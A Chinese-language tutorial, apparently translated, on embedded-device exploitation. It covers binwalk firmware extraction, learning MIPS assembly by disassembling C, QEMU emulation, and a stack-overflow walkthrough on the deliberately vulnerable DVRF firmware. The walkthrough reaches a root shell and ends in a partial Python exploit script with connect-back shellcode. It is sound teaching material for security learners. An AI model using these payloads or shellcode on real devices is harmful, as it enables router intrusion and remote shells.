2018-3-2 19:36 6576


2018-3-2 19:36

在过去的几个月中,我一直在培训人们利用嵌入式设备进行攻击。 我的幻灯片无法提供足够的信息,所以我想把所有东西都写出来供人们在线消化。 以下博文是“第1部分”,它将向读者介绍嵌入式设备的软件方面。 我决定首先涵盖软件,因为大部分漏洞都存在于软件堆栈中,不论二进制应用程序还是驱动程序。 第2部分将介绍硬件堆栈,重点介绍JTAG是如何实际工作的以及如何利用修改硬件来绕过密码保护或提取烧入目标器件的信息。


一旦你能够获得嵌入设备中的固件文件,你就会想看看里面有什么。 幸运的是有一个名为Binwalk的开源工具,它可以解析目标二进制文件中可以找到的魔术字节。






使用binwalk -e file_name 来提取镜像的内容








在vim中使用xxd显示由binwalk为TRX和gzip提供的偏移量匹配。 (使用vim打开DVRF_v03.bin,然后输入:%!xxd)












如果您对目标设备的ASM没有经验,可以使用C和反汇编器快速学习它。 在我看来,以下是学习新的ASM时首先要看的最重要的事情:


在这篇文章中,我将展示我是如何学习MIPS-I ASM的,只是使用反汇编和C语言。



#include <stdio.h>

// Function that calls another function with some arguments.
// This will be below the max amount of a(x) registers.
// by b1ack0wl

void main(){

int a = 0;
int b = 0x41;


int pass_args_to_me(int a, int b){

return (a+b);


| [0x4003b0]                    |
| main:                         | // Disassembling the main() function
| (fcn) sym.main 68             |
| addiu sp, sp, -0x28           | // Adjust stack by 40 bytes
| sw ra, 0x24(sp)               | // Return address is saved onto the Stack
| sw fp, 0x20(sp)               | // Frame pointer is saved onto the Stack
| move fp, sp                   | // Move stack pointer to the frame pointer
| sw zero, 0x18(fp)             | // Initialize int a to 0
| addiu v0, zero, 0x41          | // Add 0x41 to zero and store the result into $v0
| sw v0, 0x1c(fp)               | // Initialize int b to 0x41
| lw a0, 0x18(fp)               | // Load value of int a into $a0
| lw a1, 0x1c(fp)               | // Load value of int b into $a1
| jal sym.pass_args_to_me ;[a]  | // Jump and Link to the pass_args_to_me Function (RA = PC + 8)
| nop                           | // No instructions to execute when calling pass_args_to_me
| move sp, fp                   | // Move the frame pointer to the stack pointer register
| lw ra, 0x24(sp)               | // Restore the previously saved Return Address
| lw fp, 0x20(sp)               | // Restore the previously saved Frame Pointer address
| addiu sp, sp, 0x28            | // Adjust the offset by 40 bytes since we are leaving the function
| jr ra                         | // Jump to the address loaded in to $ra (return address register)
| nop                           | // No instruction to execute when jumping to the address in $ra


| [0x4003f4]                   |
| (fcn) sym.pass_args_to_me 52 | // Disassembling the pass_args_to_me function
| addiu sp, sp, -8             | // Adjust stack address by 8 bytes (int = 4 bytes)
| sw fp, 4(sp)                 | // Save Frame pointer Address
| move fp, sp                  | // Move SP to FP (This is behavior is an indication that we&#39;re dealing with local variables)
| sw a0, 8(fp)                 | // Save int a into the frame pointer
| sw a1, 0xc(fp)               | // Save int b into the frame pointer.
| lw v1, 8(fp)                 | // Load int a into $v1
| lw v0, 0xc(fp)               | // Load int b into $v0
| addu v0, v1, v0              | // Add $v1 and $v0 and store the result into $v0
| move sp, fp                  | // Copy the frame pointer address into the stack pointer register ($sp)
| lw fp, 4(sp)                 | // Restore previously saved frame pointer
| addiu sp, sp, 8              | // Restore stack offset (8 bytes)
| jr ra                        | // Jump to the address loaded into $ra ($ra will point to the mov sp,fp instruction in main JAL = PC + 8 into $ra)
| nop                          |

确保考虑传递给函数的参数数量大于可用参数寄存器数量的情况。 例如MIPS利用$ a0 - $ a3,让我们修改我们上面写的代码,使其具有4个以上的参数。

#include <stdio.h>

// Function that calls another function with some arguments.
// Passing more than 4 arguments to see what happens
// by b1ack0wl

void main(){

int a = 0;
int b = 1;
int c = 2;
int d = 3;
int e = 4;
int f = 5;
int g = 6;
int h = 7;
int i = 8;
int j = 9;


int pass_args_to_me(int a, int b, int c ,int d, int e, int f, int g ,int h, int i, int j){

return (a+b+c+d+e+f+g+h+i+j);


| [0x4003b0]                    |
| main: |
| (fcn) sym.main 188            |
| addiu sp, sp, -0x60           |
| sw ra, 0x5c(sp)               |
| sw fp, 0x58(sp)               |
| move fp, sp                   |
| sw zero, 0x30(fp)             | // Initialize int a to 0
| addiu v0, zero, 1             | // Perform (0+1) and store the unsigned result in register $v0
| sw v0, 0x34(fp)               | // Store $v0 at this offset (int b = 1)
| addiu v0, zero, 2             | // Perform (0+2) and store the unsigned result in register $v0
| sw v0, 0x38(fp)               | // Store $v0 at this offset (int c = 2)
| addiu v0, zero, 3             | // Perform (0+3) and store the unsigned result in register $v0
| sw v0, 0x3c(fp)               | // Store $v0 at this offset (int d = 3)
| addiu v0, zero, 4             | // Perform (0+4) and store the unsigned result in register $v0
| sw v0, 0x40(fp)               | // Store $v0 at this offset (int e = 4)
| addiu v0, zero, 5             | // Perform (0+5) and store the unsigned result in register $v0
| sw v0, 0x44(fp)               | // Store $v0 at this offset (int f = 5)
| addiu v0, zero, 6             | // Perform (0+6) and store the unsigned result in register $v0
| sw v0, 0x48(fp)               | // Store $v0 at this offset (int g = 6)
| addiu v0, zero, 7             | // Perform (0+7) and store the unsigned result in register $v0
| sw v0, 0x4c(fp)               | // Store $v0 at this offset (int h = 7)
| addiu v0, zero, 8             | // Perform (0+8) and store the unsigned result in register $v0
| sw v0, 0x50(fp)               | // Store $v0 at this offset (int i = 8)
| addiu v0, zero, 9             | // Perform (0+9) and store the unsigned result in register $v0
| sw v0, 0x54(fp)               | // Store $v0 at this offset (int j = 9)
| lw v0, 0x40(fp)               | /*
| sw v0, 0x10(sp)               |
| lw v0, 0x44(fp)               |
| sw v0, 0x14(sp)               |
| lw v0, 0x48(fp)               |
| sw v0, 0x18(sp)               | This is all for passing the arguments for the function call but on the stack
| lw v0, 0x4c(fp)               |                    (Variables int e ... int j)
| sw v0, 0x1c(sp)               |                  
| lw v0, 0x50(fp)               |
| sw v0, 0x20(sp)               |
| lw v0, 0x54(fp)               |
| sw v0, 0x24(sp)               | */
| lw a0, 0x30(fp)               | // Store local variable (int a) into register $a0 ($a0 = 0)
| lw a1, 0x34(fp)               | // Store local variable (int b) into register $a0 ($a0 = 1)
| lw a2, 0x38(fp)               | // Store local variable (int c) into register $a0 ($a0 = 2)
| lw a3, 0x3c(fp)               | // Store local variable (int d) into register $a0 ($a0 = 3)
| jal sym.pass_args_to_me ;[a]  | // Call function pass_args_to_me and store $PC+8 into register $ra
| nop                           | // No instruction performed before the call
| move sp, fp                   | // Function Exit. Store Address of the Frame Pointer into the Stack Pointer register ($sp)
| lw ra, 0x5c(sp)               | // Restore the saved return address from the stack and load it into $ra
| lw fp, 0x58(sp)               | // Restore the saved frame pointer address from the stack and load it into $fp (aka $s8)
| addiu sp, sp, 0x60            | // Restore stack offset adjustment
| jr ra                         | // Jump to the address in $ra
| nop                           | // No instruction to perform before the jump



在MIPS和基于ARM的处理器上需要注意的一件事是专用返回地址寄存器。 无论何时在MIPS上执行“跳转和链接”指令,都要知道该寄存器的地址将是指令指针的当前地址加上8个字节。 8字节的偏移量是由于流水线操作引起的,因为PC + 4将在跳转发生之前执行。 让我们编译一个在最终返回main()之前调用2个或更多函数的应用程序。

#include <stdio.h>

// Function callception!
// This is to analyze what happens when a function calls a function.
// by b1ack0wl

int call_one(); // declaration
int call_two(); // declaration

void main(){
int a = 0;
int b = 1;

int call_one(int a, int b){
return (a+b);

int call_two(){
return 1;

所以请记住,一个调用(JAL)会用$ PC + 8填充返回地址寄存器,但如果被调用函数调用另一个函数,$ ra寄存器将被覆盖,并且被调用者的地址将会丢失。 为防止这种情况,函数输入时首先将返回地址保存到堆栈中。 有了这些知识,我们将看到除了call_two之外,所有函数都会将返回地址保存到堆栈中,因为该函数不会调用任何其他函数。

| [0x4003b0]             |
| main:                  | // Start in Main but is called by the libc constructor
| (fcn) sym.main 68      |
| addiu sp, sp, -0x28    |
| sw ra, 0x24(sp)        | // Saved Return Address
| sw fp, 0x20(sp)        |
| move fp, sp            |
| sw zero, 0x18(fp)      |
| addiu v0, zero, 1      |
| sw v0, 0x1c(fp)        |
| lw a0, 0x18(fp)        |
| lw a1, 0x1c(fp)        |
| jal sym.call_one ;[a]  | // Call (Jump and Link) the function call_one
| nop                    |
| move sp, fp            |
| lw ra, 0x24(sp)        |
| lw fp, 0x20(sp)        |
| addiu sp, sp, 0x28     |
| jr ra                  |
| nop                    |
| [0x4003f4]             |
| (fcn) sym.call_one 68  | // Function call_one
| addiu sp, sp, -0x20    |
| sw ra, 0x1c(sp)        | // Saved Return Address so we can jump back to main()
| sw fp, 0x18(sp)        |
| move fp, sp            |
| sw a0, 0x20(fp)        |
| sw a1, 0x24(fp)        |
| jal sym.call_two ;[a]  | // Call (Jump and Link) the function call_two
| nop                    |
| lw v1, 0x20(fp)        |
| lw v0, 0x24(fp)        |
| addu v0, v1, v0        |
| move sp, fp            |
| lw ra, 0x1c(sp)        |
| lw fp, 0x18(sp)        |
| addiu sp, sp, 0x20     |
| jr ra                  |
| nop                    |
| [0x400438]            |
| (fcn) sym.call_two 36 | // Function call_two
| addiu sp, sp, -8      |
| sw fp, 4(sp)          |
| move fp, sp           |
| addiu v0, zero, 1     |
| move sp, fp           |
| lw fp, 4(sp)          |
| addiu sp, sp, 8       |
| jr ra                 | // Since call_two does not call any other functions there is no need to save the return address onto the stack.
| nop                   |

通过分析函数入口,我们可以预测函数是否会调用另一个函数。 这在尝试查找位于堆栈中的内存破坏漏洞时非常有用。


研究人员在分析新体系结构时需要了解的最重要的一件事是处理器如何处理分支。 就像以前一样,我们将利用C和Radare2来分析这一点。


下面的应用程序将从argv [1]中获取输入,并将其作为int进行转换,并查看它是否小于5。

#include <stdio.h>

// What if....
// This is to analyze how basic branching works on MIPS
// by b1ack0wl

int main(int argc, char **argv[]){
if (argc < 2 ){
    printf("Usage: %s number", argv[0]);
    return 1;

int a = atoi(argv[1]); // cast argv[1] as an integer
if (a < 5) {
    printf("%i is less than 5", a);
    printf("%i is greater than 5", a);
return 0;


                                     | [0x4003b0]              |
                                     | main:                   | // Main Function
                                     | (fcn) sym.main 260      |
                                     | addiu sp, sp, -0x28     |
                                     | sw ra, 0x24(sp)         |
                                     | sw fp, 0x20(sp)         |
                                     | move fp, sp             |
                                     | lui gp, 0x42            |
                                     | addiu gp, gp, 0x680     |
                                     | sw gp, 0x10(sp)         |
                                     | sw a0, 0x28(fp)         | // Store argc
                                     | sw a1, 0x2c(fp)         | // Store argv[]
                                     | lw v0, 0x28(fp)         | // Load argc into the $v0 register
                                     | slti v0, v0, 2          | // Set $v0 to 1 if the value of $v0 is less than 2, otherwise set it to 0.
                                     | beqz v0, 0x400418 ;[a]  | // If $v0 is equal take the "true" branch. (Branch if Equal to Zero)
                                     | nop                     |
                                           t f
                           .---------------' '--------------------------------.
                           |                                                  |
                           |                                                  |
                     =-------------------------=                  =-----------------------=
                     |  0x400418               |                  |  0x4003e4             |
                     | lw v0, 0x2c(fp)         | // load argv[]   | lw v0, 0x2c(fp)       |
                     | addiu v0, v0, 4         | // offset +4     | lw v1, (v0)           |
                     | lw v0, (v0)             | // load argv[1]  | lui v0, 0x40          |
                     | move a0, v0             |                  | addiu a0, v0, 0x70f0  | // Load Format String
                     | lw v0, -0x7fd0(gp)      | // $v0 = atoi    | move a1, v1           | // Load argv[0]
                     | move t9, v0             | // $t9 = $v0     | lw v0, -0x7fd4(gp)    | // Resolve printf pointer and load it into $v0
                     | jalr t9  ; atoi         | // call atoi     | move t9, v0           | // Move $v0 into $t9
                     | nop                     |                  | jalr t9   ; printf    | // Call printf which is in $t9 (Jump and Link Register)
                     | lw gp, 0x10(fp)         |                  | nop                   |
                     | sw v0, 0x18(fp)         | // int a         | lw gp, 0x10(fp)       |
                     | lw v0, 0x18(fp)         | // load int a    | addiu v0, zero, 1     | // Return 1
                     | slti v0, v0, 5          | // if < 5        | j 0x40049c ;[d]       | // Exit function
                     | beqz v0, 0x400478 ;[b]  | // true if $v0=0 | nop                   |
                     | nop                     |                  =-----------------------=
                     =-------------------------=                             v
                           t f                                               |
             .-------------' '---------------------------------.             '--.
             |                                                 |                |
             |                                                 |                |
  =-----------------------=                       =-----------------------=     |
  |  0x400478             |                       |  0x400450             |     |
  | lui v0, 0x40          |                       | lui v0, 0x40          |     |  // Block 0x400450 does the same as 0x400478
  | addiu a0, v0, 0x7118  | // load format string | addiu a0, v0, 0x7104  |     |  // Just needs to jump due to where it sits.
  | lw a1, 0x18(fp)       | // int a printf arg   | lw a1, 0x18(fp)       |     |
  | lw v0, -0x7fd4(gp)    | // load printf in $v0 | lw v0, -0x7fd4(gp)    |     |
  | move t9, v0           | // move $v0 to $t9    | move t9, v0           |     |
  | jalr t9  ; printf     | // call $t9 (printf)  | jalr t9 ; printf      |     |
  | nop                   |                       | nop                   |     |
  | lw gp, 0x10(fp)       |                       | lw gp, 0x10(fp)       |     |
  =-----------------------=                       | j 0x400498 ;[c]       |     | // Jump to Return 0 due to memory position
      v                                           | nop                   |     |
      |                                           =-----------------------=     |
      '-----------------.                             v                         |
                        .-----------------------------'                         |
                        |                                                       |
                        |                                                       |
                    =----------------=                                          |
                    |  0x400498      |                                          |
                    | move v0, zero  |  // Return 0                             |
                    =----------------=                                          |
                        v                                                       |
                                  |  0x40049c           |
                                  | move sp, fp         |
                                  | lw ra, 0x24(sp)     |
                                  | lw fp, 0x20(sp)     |
                                  | addiu sp, sp, 0x28  |
                                  | jr ra               | // Function be gone!

每当我们做比较时,我们就可以看到slti指令的用法。 由于大量的比较运算符和类型,条件语句将成为学习新汇编语言中最耗时的部分。 请参考C参考文献,以确保您分析了生成条件分支的所有不同方法。 例如在MIPS中,有些条件语句使用可能被滥用的有符号或无符号立即数。


现在你已经看到了一些例子,只要你有一个编译器和反汇编器,你就应该有能力来学习任何处理器的架构和汇编。 如果你不这样做,那么你将不得不以更加艰难的方式去做,阅读处理器的开发者手册,最终设计你自己的汇编器,模拟器和反汇编器。


如果您正在审计使用开源软件的设备,该软件可能会根据通用公共许可证进行许可。 如果是这样,那么简而言之,如果开发人员使用代码并编译它,则必须提供源代码! 如果开发者拒绝开源,那么他们就违反了GPL。


考虑到这一点,许多路由器或其他小型设备都使用Linux(或FreeRTOS),Busybox和其他利用GPL的开源软件。 因此,在开始反汇编之前,尝试使用短语“$供应商源代码”或“$产品源代码”进行简单的Google搜索。 以下是我只是通过Google搜索发现的一些示例源代码库。
Samsung Open Source Release Center
ASUS RT-AC68U Source Code
Belkin Open Source Code Center
GPL Code Center - TP-LINK




本节将假设读者具有利用基于内存损坏的漏洞的基本知识。 如果没有,请参阅本页底部的SmashtheStack参考。 SmashtheStack是我个人开始进入x86开发之旅的地方。



# cat /proc/11554/maps
00400000-00402000 r-xp 00000000 1f:02 218        /pwnable/ShellCode_Required/socket_bof
00441000-00442000 rw-p 00001000 1f:02 218        /pwnable/ShellCode_Required/socket_bof
2aaa8000-2aaad000 r-xp 00000000 1f:02 440        /lib/ld-uClibc.so.0
2aaad000-2aaae000 rw-p 2aaad000 00:00 0
2aaec000-2aaed000 r--p 00004000 1f:02 440        /lib/ld-uClibc.so.0
2aaed000-2aaee000 rw-p 00005000 1f:02 440        /lib/ld-uClibc.so.0
2aaee000-2aafe000 r-xp 00000000 1f:02 445        /lib/libgcc_s.so.1
2aafe000-2ab3d000 ---p 2aafe000 00:00 0
2ab3d000-2ab3e000 rw-p 0000f000 1f:02 445        /lib/libgcc_s.so.1
2ab3e000-2ab79000 r-xp 00000000 1f:02 444        /lib/libc.so.0
2ab79000-2abb9000 ---p 2ab79000 00:00 0
2abb9000-2abba000 rw-p 0003b000 1f:02 444        /lib/libc.so.0
2abba000-2abbe000 rw-p 2abba000 00:00 0
7f81e000-7f833000 rwxp 7f81e000 00:00 0          [stack]

正如你所看到的堆栈和堆区域被标记为可执行的,所以NX不用担心。 尽管堆栈是可执行的,但为了获得代码执行,还需要一些ROP操作。 您还会发现ASLR并未在大多数设备上实现,因此我们不必首先找到信息泄露错误。




如果您使用的是基于Debian的Linux Distro,那么您可以通过apt-get来安装QEMU。 sudo apt-get install qemu-user-static qemu-system- *


一旦你安装了QEMU,你就需要将二进制文件复制到解压缩固件的根目录下。在这个例子中,我们将使用DVRF_v03的MIPS Little Endian模拟器。 cpwhich qemu-mipsel-static ./


我们将使用pwnable binary / pwnable / Intro / stack_bof_01并为它制作一个小小的漏洞。然后,我们将把我们的有效载荷粘贴到实际设备上,以查看发生了什么。



#include <string.h>
#include <stdio.h>

//Simple BoF by b1ack0wl for E1550

int main(int argc, char **argv[]){
  char buf[200] ="\0";
  if (argc < 2){
    printf("Usage: stack_bof_01 <argument>\r\n-By b1ack0wl\r\n");
    printf("Welcome to the first BoF exercise!\r\n\r\n");
    strcpy(buf, argv[1]);
    printf("You entered %s \r\n", buf);
    printf("Try Again\r\n");
    return 0x41; // Just so you can see what register is populated for return statements

void dat_shell(){
  printf("Congrats! I will now execute /bin/sh\r\n- b1ack0wl\r\n");
  system("/bin/sh -c");

所以我们有一个简单的基于栈的缓冲区溢出漏洞。 目标是执行函数“dat_shell”,但在分析ELF文件时,我们看到以下内容:
Entry point address: 0x00400630


由于我们的载荷中不能有NULL字节,我们将不得不依赖于执行部分覆盖。 由于这是Little Endian,我们可以覆盖3个最低字节,同时将最高字节设置为NULL。 如果架构是Big Endian,这种技术将无法工作。



b1ack0wl@b1ack0wl-VM ~/DVRF/_DVRF_v03.bin.extracted/squashfs-root $ sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"


(gdb) target remote Connection timed out.
(gdb) target remote
Remote debugging using
0x767b9a80 in ?? ()
(gdb) c

Program received signal SIGSEGV, Segmentation fault.
0x41386741 in ?? ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 fffffff8 00000041 767629b8 0000000a 767629c3 0000000b 00000000
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   81010100 7efefeff 37674136 41386741 68413967 31684130 41326841 68413368
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  00000000 00000000 00000000 ffffffff 76fff634 0040059c 00000002 004007e0
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  766e65e0 766ef270 00000000 00000000 00448cd0 76fff558 37674136 41386741
            sr       lo       hi      bad    cause       pc
      20000010 0000000a 00000000 41386740 00000000 41386741
           fsr      fir
      00000000 00739300



再试一次,使最终目标$RA 0x00424242。

b1ack0wl@b1ack0wl-VM ~/DVRF/_DVRF_v03.bin.extracted/squashfs-root $ sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7BBB"
(gdb) target remote
Remote debugging using

Program received signal SIGTRAP, Trace/breakpoint trap.
0x767b9a80 in ?? ()
(gdb) c

Program received signal SIGSEGV, Segmentation fault.
0x00424242 in ?? ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 fffffff8 00000041 767629b8 0000000a 767629c3 0000000b 00000000
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   81010100 7efefeff 41366641 66413766 39664138 41306741 67413167 33674132
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  00000000 00000000 00000000 ffffffff 76fff694 0040059c 00000002 004007e0
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  766e65e0 766ef270 00000000 00000000 00448cd0 76fff5b8 37674136 00424242
            sr       lo       hi      bad    cause       pc
      20000010 0000000a 00000000 00424242 00000000 00424242
           fsr      fir
      00000000 00739300

(gdb) disass dat_shell
      Dump of assembler code for function dat_shell:
         0x00400950 <+0>:   lui gp,0x5          /*
         0x00400954 <+4>:   addiu   gp,gp,-31872           Skip over
         0x00400958 <+8>:   addu    gp,gp,t9      */
         0x0040095c <+12>:  addiu   sp,sp,-32 // This is where we need to jump to
         0x00400960 <+16>:  sw  ra,28(sp)
         0x00400964 <+20>:  sw  s8,24(sp)
         0x00400968 <+24>:  move    s8,sp
         0x0040096c <+28>:  sw  gp,16(sp)

我们希望跳过修改$ gp的指令,因为应用程序会崩溃。 所以我们将跳转到0x0040095c。

b1ack0wl@b1ack0wl-VM ~/DVRF/_DVRF_v03.bin.extracted/squashfs-root $ sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7`echo -e '\\x5c\\x09\\x40'`"
Welcome to the first BoF exercise!

You entered Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7\   @
Try Again
Congrats! I will now execute /bin/sh
- b1ack0wl


(gdb) target remote
Remote debugging using
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
0x767b9a80 in ?? ()

(gdb) break *0x0040095c
Breakpoint 1 at 0x40095c

(gdb) c
warning: Could not load shared library symbols for 3 libraries, e.g. /lib/libgcc_s.so.1.
Use the "info sharedlibrary" command to see the complete listing.
Do you need "set solib-search-path" or "set sysroot"?

Breakpoint 1, 0x0040095c in dat_shell ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 fffffff8 00000041 767629b8 0000000a 767629c3 0000000b 00000000
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   81010100 7efefeff 41366641 66413766 39664138 41306741 67413167 33674132
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  00000000 00000000 00000000 ffffffff 76fff694 0040059c 00000002 004007e0
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  766e65e0 766ef270 00000000 00000000 00448cd0 76fff5b8 37674136 0040095c
            sr       lo       hi      bad    cause       pc
      20000010 0000000a 00000000 00000000 00000000 0040095c
           fsr      fir
      00000000 00739300
(gdb) x/3i $pc
=> 0x40095c <dat_shell+12>: addiu   sp,sp,-32
   0x400960 <dat_shell+16>: sw  ra,28(sp)
   0x400964 <dat_shell+20>: sw  s8,24(sp)


\# cd /
\# ./pwnable/Intro/stack_bof_01 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7`echo -e '\\x5c\\x09\\x40'`"
tered Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag7\      @
Try Again
Congrats! I will now execute /bin/sh
- b1ack0wl
uid=0(root) gid=0(root)


(gdb) set solib-search-path /<path to>/_DVRF_v03.bin.extracted/squashfs-root/lib/

(gdb) info sharedlibrary
From        To          Syms Read   Shared Object Library
0x76767b00  0x76774c20  Yes (*)     /home/b1ack0wl/DVRF/_DVRF_v03.bin.extracted/squashfs-root/lib/libgcc_s.so.1
0x766eb710  0x7671c940  Yes (*)     /home/b1ack0wl/DVRF/_DVRF_v03.bin.extracted/squashfs-root/lib/libc.so.0
0x767b9a80  0x767bd800  Yes (*)     /home/b1ack0wl/DVRF/_DVRF_v03.bin.extracted/squashfs-root/lib/ld-uClibc.so.0

要获得基地址,您需要从表格中的“From”地址中减去Entry Point地址。 例如,通过执行以下操作可以找到libc.so.0的基址:

b1ack0wl@b1ack0wl-VM ~/DVRF/_DVRF_v03.bin.extracted/squashfs-root/lib $ readelf -a ./libc.so.0 | more
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           MIPS R3000
  Version:                           0x1
  Entry point address:               0x6710  // Address to subtract代码

libc.so.0 = 0x766eb710 - 0x6710 = 0x766E5000




b1ack0wl@b1ack0wl-VM ~/DVRF/_DVRF_v03.bin.extracted/squashfs-root $ r2 ./lib/libc.so.0
 -- Remember to maintain your ~/.radare_history
[0x00006710]> aaaa
[0x00006710]> s sym.printf
[0x000179e0]>  // This is the offset we need to add in order to get to printf


(gdb) x/10i 0x766E5000+0x000179e0
   0x766fc9e0 <printf>: lui gp,0x7     // Same Instructions as Radare2 (gdb values in decimal vs hex)
   0x766fc9e4 <printf+4>:   addiu   gp,gp,-17424
   0x766fc9e8 <printf+8>:   addu    gp,gp,t9
   0x766fc9ec <printf+12>:  addiu   sp,sp,-40
   0x766fc9f0 <printf+16>:  sw  ra,32(sp)
   0x766fc9f4 <printf+20>:  sw  gp,16(sp)
   0x766fc9f8 <printf+24>:  lw  v0,-30788(gp)


   [0x000179e0]> pd
   / (fcn) sym.printf 88
   |           0x000179e0      07001c3c       lui gp, 7    // Same Instructions as seen in Radare2
   |           0x000179e4      f0bb9c27       addiu gp, gp, -0x4410
   |           0x000179e8      21e09903       addu gp, gp, t9
   |           0x000179ec      d8ffbd27       addiu sp, sp, -0x28
   |           0x000179f0      2000bfaf       sw ra, 0x20(sp)
   |           0x000179f4      1000bcaf       sw gp, 0x10(sp)
   |           0x000179f8      bc87828f       lw v0, -0x7844(gp)

因此,一旦建立了ROP链,您只需要替换可通过cat / proc / [pid] / maps找到的libc地址。 基地址就是你需要的。 如果ROP在QEMU工作,它有99%的可能性在实际设备上工作。

DVRFv0.3 socket_bof Solution

在设计DVRF项目中的练习时,我想包括我亲眼所见的最常见类型的漏洞。 最常见的是基于堆栈的缓冲区溢出,如果您不熟悉ASM,这可能有点难度。



import socket, sys , base64, struct, string, time
from getopt import getopt as GetOpt, GetoptError

def usage():
    print ""
    print "Socket_bof solution for DVRF_v03"
    print "By: Elvis Collado [b1ack0wl]"
    print ""
    print "Usage: %s -s source.ip -d dst.ip -p dst.port" % sys.argv[0]
    print ""
    print "\t-s                     Connect back IP"
    print "\t-d                     Destination IP of Socket Listener"
    print "\t-p                     Destination Port that socket_bof is listening on"
    print "\t-h                     Print this Help Menu"
    print ""

    (opts, args) = GetOpt(sys.argv[1:], 's:d:p:h')
except GetoptError, e:
for opt, arg in opts:
    if opt == "-s":
        connectback_ip = arg.split(".")
        for a in connectback_ip:
            if int(a) == 0:
                print "IP cannot have NULL Bytes :("

        IP_1= struct.pack("<B",int(connectback_ip[0]))
        IP_2= struct.pack("<B",int(connectback_ip[1]))
        IP_3= struct.pack("<B",int(connectback_ip[2]))
        IP_4= struct.pack("<B",int(connectback_ip[3]))
    elif opt == "-d":
        host = arg
    elif opt == "-p":
        port = int(arg)
    #create an AF_INET, STREAM socket (TCP)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
    print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]

    remote_ip = socket.gethostbyname( host )

except socket.gaierror:
    #could not resolve
    print 'Hostname could not be resolved. Exiting'

#Connect to remote server
s.connect((remote_ip , port))

# Shellcode From bowcaster

shellcode = string.join([
    "\xfa\xff\x0f\x24", # li    t7,-6
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xfd\xff\xe4\x21", # addi  a0,t7,-3
        "\xfd\xff\xe5\x21", # addi  a1,t7,-3
        "\xff\xff\x06\x28", # slti  a2,zero,-1
        "\x57\x10\x02\x24", # li    v0,4183
        "\x0c\x01\x01\x01", # syscall   0x40404
        "\xff\xff\xa2\xaf", # sw    v0,-1(sp)
